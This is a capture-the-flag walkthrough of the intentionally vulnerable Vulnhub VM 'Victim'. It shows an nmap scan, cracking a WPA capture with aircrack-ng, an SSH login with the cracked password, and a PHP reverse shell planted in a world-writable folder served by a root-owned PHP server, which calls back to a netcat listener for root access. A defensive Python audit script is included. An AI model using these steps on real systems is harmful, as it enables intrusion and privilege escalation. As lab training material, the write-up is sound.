[VLN] Victim

Today we are going to hack the Vulnhub machine called Victim. You can download it from the following link: Victim

Video


Enumeration


We start with an nmap scan to see which ports are open.

sml@Cassandra:~$ nmap -A -p- 192.168.1.79
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-07 13:08 CEST
Nmap scan report for 192.168.1.79
Host is up (0.0023s latency).
Not shown: 65530 filtered ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 ea:e8:15:7d:8a:74:bc:45:09:76:34:13:2c:d8:1e:62 (RSA)
|   256 51:75:37:23:b6:0f:7d:ed:61:a0:61:18:21:89:35:5d (ECDSA)
|_  256 7d:36:08:ba:91:ef:24:9f:7b:24:f6:64:c7:53:2c:b0 (ED25519)
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 403 Forbidden
8080/tcp open  http    BusyBox httpd 1.13
|_http-title: 404 Not Found
8999/tcp open  http    WebFS httpd 1.21
|_http-server-header: webfs/1.21
|_http-title: 0.0.0.0:8999/
9000/tcp open  http    PHP cli server 5.5 or later (PHP 7.2.30-1)
|_http-title: Uncaught Exception: MissingDatabaseExtensionException
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 146.45 seconds

After looking at the open ports, we visit the following link: http://192.168.1.79:8999/

We can see that there is a file which, by its name and extension, looks like a network packet capture, probably something related to WPA: http://192.168.1.79:8999/WPA.cap

We download the file and crack it:

sml@Cassandra:~/Descargas$ aircrack-ng WPA-01.cap -w /home/sml/rockyou.txt
[00:00:07] 70679/14344392 keys tested (10580.06 k/s) 

      Time left: 22 minutes, 29 seconds                          0.49%

                       Current passphrase: p4ssword                   
                           KEY FOUND! [ p4ssword ]

We open the file with Wireshark and see that the SSID is "dlink". We log in using the SSID as the username and the password we just cracked (dlink/p4ssword).

Low Shell



sml@Cassandra:~$ ssh dlink@192.168.1.79
The authenticity of host '192.168.1.79 (192.168.1.79)' can't be established.
ECDSA key fingerprint is SHA256:rlY5QcLGFoLjkoNzEVHA0e3fVUALcYpJ3l9rqJRyPCY.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.1.79' (ECDSA) to the list of known hosts.
dlink@192.168.1.79's password: 
Last login: Tue Apr  7 23:36:49 2020 from 192.168.86.99

We look at the running processes to see if any of them is interesting.

dlink@victim01:~$ ps aux
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.4 159668  8812 ?        Ss   11:07   0:01 /sbin/init maybe-ubiquity
root         2  0.0  0.0      0     0 ?        S    11:07   0:00 [kthreadd]
root         4  0.0  0.0      0     0 ?        I<   11:07   0:00 [kworker/0:0H]
root         6  0.0  0.0      0     0 ?        I<   11:07   0:00 [mm_percpu_wq]
root         7  0.1  0.0      0     0 ?        S    11:07   0:04 [ksoftirqd/0]
root         8  0.0  0.0      0     0 ?        I    11:07   0:03 [rcu_sched]
root         9  0.0  0.0      0     0 ?        I    11:07   0:00 [rcu_bh]
root        10  0.0  0.0      0     0 ?        S    11:07   0:00 [migration/0]
root        11  0.0  0.0      0     0 ?        S    11:07   0:00 [watchdog/0]
root        12  0.0  0.0      0     0 ?        S    11:07   0:00 [cpuhp/0]
root        13  0.0  0.0      0     0 ?        S    11:07   0:00 [kdevtmpfs]
root        14  0.0  0.0      0     0 ?        I<   11:07   0:00 [netns]
root        15  0.0  0.0      0     0 ?        S    11:07   0:00 [rcu_tasks_kthre]
root        16  0.0  0.0      0     0 ?        S    11:07   0:00 [kauditd]
root        17  0.0  0.0      0     0 ?        S    11:07   0:00 [khungtaskd]
root        18  0.0  0.0      0     0 ?        S    11:07   0:00 [oom_reaper]
root        19  0.0  0.0      0     0 ?        I<   11:07   0:00 [writeback]
root        20  0.0  0.0      0     0 ?        S    11:07   0:00 [kcompactd0]
root        21  0.0  0.0      0     0 ?        SN   11:07   0:00 [ksmd]
root        22  0.0  0.0      0     0 ?        SN   11:07   0:00 [khugepaged]
root        23  0.0  0.0      0     0 ?        I<   11:07   0:00 [crypto]
root        24  0.0  0.0      0     0 ?        I<   11:07   0:00 [kintegrityd]
root        25  0.0  0.0      0     0 ?        I<   11:07   0:00 [kblockd]
root        26  0.0  0.0      0     0 ?        I<   11:07   0:00 [ata_sff]
root        27  0.0  0.0      0     0 ?        I<   11:07   0:00 [md]
root        28  0.0  0.0      0     0 ?        I<   11:07   0:00 [edac-poller]
root        29  0.0  0.0      0     0 ?        I<   11:07   0:00 [devfreq_wq]
root        30  0.0  0.0      0     0 ?        I<   11:07   0:00 [watchdogd]
root        34  0.0  0.0      0     0 ?        S    11:07   0:00 [kswapd0]
root        35  0.0  0.0      0     0 ?        I<   11:07   0:00 [kworker/u3:0]
root        36  0.0  0.0      0     0 ?        S    11:07   0:00 [ecryptfs-kthrea]
root        78  0.0  0.0      0     0 ?        I<   11:07   0:00 [kthrotld]
root        79  0.0  0.0      0     0 ?        I<   11:07   0:00 [acpi_thermal_pm]
root        80  0.0  0.0      0     0 ?        S    11:07   0:00 [scsi_eh_0]
root        81  0.0  0.0      0     0 ?        I<   11:07   0:00 [scsi_tmf_0]
root        82  0.0  0.0      0     0 ?        S    11:07   0:00 [scsi_eh_1]
root        83  0.0  0.0      0     0 ?        I<   11:07   0:00 [scsi_tmf_1]
root        89  0.0  0.0      0     0 ?        I<   11:07   0:00 [ipv6_addrconf]
root        98  0.0  0.0      0     0 ?        I<   11:07   0:00 [kstrp]
root       115  0.0  0.0      0     0 ?        I<   11:07   0:00 [charger_manager]
root       177  0.0  0.0      0     0 ?        I<   11:07   0:00 [kworker/0:1H]
root       195  0.0  0.0      0     0 ?        S    11:07   0:00 [scsi_eh_2]
root       196  0.0  0.0      0     0 ?        I<   11:07   0:00 [scsi_tmf_2]
root       197  0.0  0.0      0     0 ?        I<   11:07   0:00 [ttm_swap]
root       198  0.0  0.0      0     0 ?        S    11:07   0:00 [irq/18-vmwgfx]
root       269  0.0  0.0      0     0 ?        I<   11:07   0:00 [raid5wq]
root       322  0.0  0.0      0     0 ?        S    11:07   0:00 [jbd2/sda2-8]
root       323  0.0  0.0      0     0 ?        I<   11:07   0:00 [ext4-rsv-conver]
root       331  0.0  0.5 315672 11816 ?        Ss   12:05   0:00 php -S 0.0.0.0:9000 -t /var/www/bolt/public/
root       397  0.0  0.0      0     0 ?        I<   11:07   0:00 [iscsi_eh]
root       407  0.0  0.0      0     0 ?        I<   11:07   0:00 [ib-comp-wq]
root       408  0.0  0.0      0     0 ?        I<   11:07   0:00 [ib-comp-unb-wq]
root       409  0.0  0.0      0     0 ?        I<   11:07   0:00 [ib_mcast]
root       410  0.0  0.0      0     0 ?        I<   11:07   0:00 [ib_nl_sa_wq]
root       411  0.0  0.0      0     0 ?        I<   11:07   0:00 [rdma_cm]
root       420  0.0  0.2  46764  5464 ?        Ss   11:07   0:00 /lib/systemd/systemd-udevd
root       422  0.0  0.0  97708  1680 ?        Ss   11:07   0:00 /sbin/lvmetad -f
dlink      453  0.0  0.1  34404  2808 pts/0    R+   12:10   0:00 ps aux
systemd+   461  0.0  0.1 141936  3192 ?        Ssl  11:08   0:00 /lib/systemd/systemd-timesyncd
root       511  0.0  0.0      0     0 ?        I<   11:08   0:00 [iprt-VBoxWQueue]
systemd+   680  0.0  0.2  80180  5596 ?        Ss   11:08   0:00 /lib/systemd/systemd-networkd
systemd+   702  0.2  0.2  70640  4948 ?        Ss   11:08   0:08 /lib/systemd/systemd-resolved
root       774  0.0  0.8 169104 16800 ?        Ssl  11:08   0:00 /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers
root       775  0.0  0.4 434332  9532 ?        Ssl  11:08   0:00 /usr/sbin/ModemManager --filter-policy=strict
daemon     777  0.0  0.1  28332  2048 ?        Ss   11:08   0:00 /usr/sbin/atd -f
root       778  0.0  0.1  30028  2888 ?        Ss   11:08   0:00 /usr/sbin/cron -f
message+   780  0.0  0.2  50264  4484 ?        Ss   11:08   0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-
root       802  0.0  0.1  57400  2984 ?        S    11:08   0:00 /usr/sbin/CRON -f
root       822  0.0  0.0   4628   832 ?        Ss   11:08   0:00 /bin/sh -c sleep 30 && /var/www/bolt/public/bolt_start.sh
root       833  0.0  0.2  45248  5360 ?        Ss   11:08   0:00 /sbin/wpa_supplicant -u -s -O /run/wpa_supplicant
root       834  0.0  0.6 405488 13636 ?        Ssl  11:08   0:00 /usr/sbin/NetworkManager --no-daemon
root       845  0.0  0.2  62148  5756 ?        Ss   11:08   0:00 /lib/systemd/systemd-logind
root       846  0.0  0.3 288532  6828 ?        Ssl  11:08   0:00 /usr/lib/accountsservice/accounts-daemon
root       851  0.0  0.0 621536  1820 ?        Ssl  11:08   0:01 /usr/bin/lxcfs /var/lib/lxcfs/
syslog     853  0.0  0.1 263036  4032 ?        Ssl  11:08   0:00 /usr/sbin/rsyslogd -n
root       854  0.0  1.1 639292 23552 ?        Ssl  11:08   0:00 /usr/lib/snapd/snapd
root       905  0.0  0.3 288884  6288 ?        Ssl  11:08   0:00 /usr/lib/policykit-1/polkitd --no-debug
root       954  0.0  0.9 185944 19008 ?        Ssl  11:08   0:00 /usr/bin/python3 /usr/share/unattended-upgrades/unattended-upgrade-shutdown --wait-for-signal
root       986  0.0  1.0 448404 21656 ?        Ssl  11:08   0:02 /usr/bin/python3 /usr/bin/fail2ban-server -xf start
root      1112  0.0  0.2  72300  5952 ?        Ss   11:08   0:00 /usr/sbin/sshd -D
root      1113  0.0  0.0  14888  1688 tty1     Ss+  11:08   0:00 /sbin/agetty -o -p -- \u --noclear tty1 linux
mysql     1158  0.0  8.7 1162256 178652 ?      Sl   11:08   0:02 /usr/sbin/mysqld --daemonize --pid-file=/run/mysqld/mysqld.pid
www-data  1169  0.0  0.1  43444  2372 ?        Ss   11:08   0:00 /usr/bin/webfsd -k /var/run/webfs/webfsd.pid -r /var/www/html -n victim01 -i 0.0.0.0 -p 8999 -u www-
root      1321  0.0  1.9 480416 40688 ?        Ss   11:08   0:00 /usr/sbin/apache2 -k start
www-data  1348  0.2  1.9 483452 38824 ?        S    11:08   0:07 /usr/sbin/apache2 -k start
www-data  1349  0.2  2.0 483456 41312 ?        S    11:08   0:08 /usr/sbin/apache2 -k start
root      1415  0.0  0.0   4628   760 ?        S    11:08   0:00 /bin/sh /var/www/bolt/public/bolt_start.sh
root      1417 26.0  1.6 315672 33076 ?        S    11:08  16:03 php -S 0.0.0.0:9000 -t /var/www/bolt/public/
root      1418  0.1  0.0   5140   472 ?        Ss   11:08   0:05 busybox httpd -p 0.0.0.0:8080 -h /home/victim01
www-data  1592  0.2  1.9 483316 38932 ?        S    11:10   0:07 /usr/sbin/apache2 -k start
www-data  1595  0.2  1.7 483120 36688 ?        S    11:10   0:07 /usr/sbin/apache2 -k start
www-data  1596  0.2  1.8 483120 36748 ?        S    11:10   0:07 /usr/sbin/apache2 -k start
www-data  1597  0.2  1.9 483452 40464 ?        S    11:10   0:07 /usr/sbin/apache2 -k start
www-data  1598  0.2  1.9 483452 39116 ?        S    11:10   0:07 /usr/sbin/apache2 -k start
www-data  1785  0.1  1.8 483256 36884 ?        S    11:11   0:05 /usr/sbin/apache2 -k start
www-data  1786  0.1  1.8 483120 36748 ?        S    11:11   0:05 /usr/sbin/apache2 -k start
www-data  1789  0.1  1.9 483452 38860 ?        S    11:11   0:05 /usr/sbin/apache2 -k start
dlink    31042  0.0  0.1  74656  3292 ?        S    11:52   0:00 sshd: dlink@pts/0
dlink    31043  0.0  0.2  19960  4656 pts/0    Ss   11:52   0:00 -bash

We see that the following process is running as root:

root      1417 26.0  1.6 315672 33076 ?        S    11:08  16:03 php -S 0.0.0.0:9000 -t /var/www/bolt/public/

We check whether we can write to any of its folders.

dlink@victim01:~$ ls -l /var/www/bolt/public/     
total 28
drwxr-xr-x 6 root root 4096 Nov 12 17:23 bolt-public
-rwxr-xr-x 1 root root   45 Apr  7 22:01 bolt_start.sh
drwxr-xr-x 2 root root 4096 Aug 25  2018 extensions
drwxrwxrwx 2 root root 4096 May  7 12:05 files
-rw-r--r-- 1 root root  295 Aug 25  2018 index.php
drwxr-xr-x 5 root root 4096 Nov 12 17:23 theme
drwxr-xr-x 2 root root 4096 Aug 25  2018 thumbs

We see that we have write permission on the /var/www/bolt/public/files folder.
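From the defender's side, the misconfiguration found here (a web server running as root whose document root contains a directory anyone can write to) is easy to audit for. This is an added example, not part of the original write-up: the `ps aux` lines are constructed from the output above, and the temporary directory tree built in `demo()` stands in for /var/www/bolt/public/.

```python
import os
import stat
import tempfile

# Constructed `ps aux` lines modelled on the write-up's output (sample data, not a capture).
PS_SAMPLE = """\
root      1417 26.0  1.6 315672 33076 ?  S  11:08 16:03 php -S 0.0.0.0:9000 -t /var/www/bolt/public/
root      1418  0.1  0.0   5140   472 ?  Ss 11:08  0:05 busybox httpd -p 0.0.0.0:8080 -h /home/victim01
www-data  1169  0.0  0.1  43444  2372 ?  Ss 11:08  0:00 /usr/bin/webfsd -r /var/www/html -p 8999 -u www-data
"""

# Command-line flag that names the document root for each server seen on the box.
DOCROOT_FLAGS = {"php": "-t", "httpd": "-h", "webfsd": "-r"}


def root_served_docroots(ps_text):
    """Return [(pid, docroot)] for web servers that run as root, parsed from `ps aux` text."""
    found = []
    for line in ps_text.splitlines():
        fields = line.split(None, 10)  # USER PID ... COMMAND; the 11th field keeps its spaces
        if len(fields) < 11 or fields[0] != "root":
            continue
        argv = fields[10].split()
        if os.path.basename(argv[0]) == "busybox" and len(argv) > 1:
            argv = argv[1:]  # `busybox httpd ...`: the applet name is the next token
        flag = DOCROOT_FLAGS.get(os.path.basename(argv[0]))
        if flag and flag in argv and argv.index(flag) + 1 < len(argv):
            found.append((fields[1], argv[argv.index(flag) + 1]))
    return found


def world_writable_dirs(docroot):
    """Directories under docroot that any user can write to, relative to docroot.
    A sticky bit would not stop someone from creating a new file, so it is not excluded."""
    hits = []
    for dirpath, _dirs, _files in os.walk(docroot):
        if os.stat(dirpath).st_mode & stat.S_IWOTH:
            hits.append(os.path.relpath(dirpath, docroot))
    return sorted(hits)


def demo():
    """Build a throwaway tree shaped like /var/www/bolt/public and audit it."""
    base = tempfile.mkdtemp()
    for name, mode in (("files", 0o777), ("theme", 0o755), ("extensions", 0o755)):
        path = os.path.join(base, name)
        os.mkdir(path)
        os.chmod(path, mode)  # chmod after mkdir so the umask does not mask the 0777
    return world_writable_dirs(base)
```

On a real host, feed `root_served_docroots` the output of `ps aux` and pass each returned document root to `world_writable_dirs`; any hit is a directory where a file dropped by an unprivileged user would be executed by the root-owned server.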

Privilege Escalation


We prepare a PHP reverse shell to place in /var/www/bolt/public/files and thus obtain a root shell.

sml@Cassandra~$ cp /usr/share/webshells/php/php-reverse-shell.php  webshell.php

We edit the shell and change the values to our IP and port. Once modified, we copy it to the victim machine.

sml@Cassandra:~$ scp webshell.php dlink@192.168.1.79:/var/www/bolt/public/files
dlink@192.168.1.79's password: 
webshell.php
sml@Cassandra:~$ nc -nlvp 5555

We browse to: http://192.168.1.79:9000/files/webshell.php

sml@Cassandra:~$ nc -nlvp 5555
listening on [any] 5555 ...
connect to [192.168.1.148] from (UNKNOWN) [192.168.1.79] 41524
Linux victim01 4.15.0-96-generic #97-Ubuntu SMP Wed Apr 1 03:25:46 UTC 2020 
x86_64 x86_64 x86_64 GNU/Linux
 12:05:49 up 57 min,  1 user,  load average: 0.00, 0.00, 0.09
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
dlink    pts/0    192.168.1.148    11:52    1:32   0.30s  0.30s -bash
uid=0(root) gid=0(root) groups=0(root)
/bin/sh: 0: can't access tty; job control turned off
# whoami
root

flag.txt



# cd /root
# ls
flag.txt
snap
# cat flag.txt  
Nice work!

                .:##:::.
              .:::::/;;\:.
        ()::::::@::/;;#;|:.
        ::::##::::|;;##;|::
         ':::::::::\;;;/::'
              ':::::::::::
               |O|O|O|O|O|O
               :#:::::::##::.
              .:###:::::#:::::.
              :::##:::::::::::#:.
               ::::;:::::::::###::.
               ':::;::###::;::#:::::
                ::::;::#::;::::::::::
                :##:;::::::;::::###:::     .
              .:::::; .:::##::::::::::::::::
              ::::::; :::::::::::::::::##::  #rootdance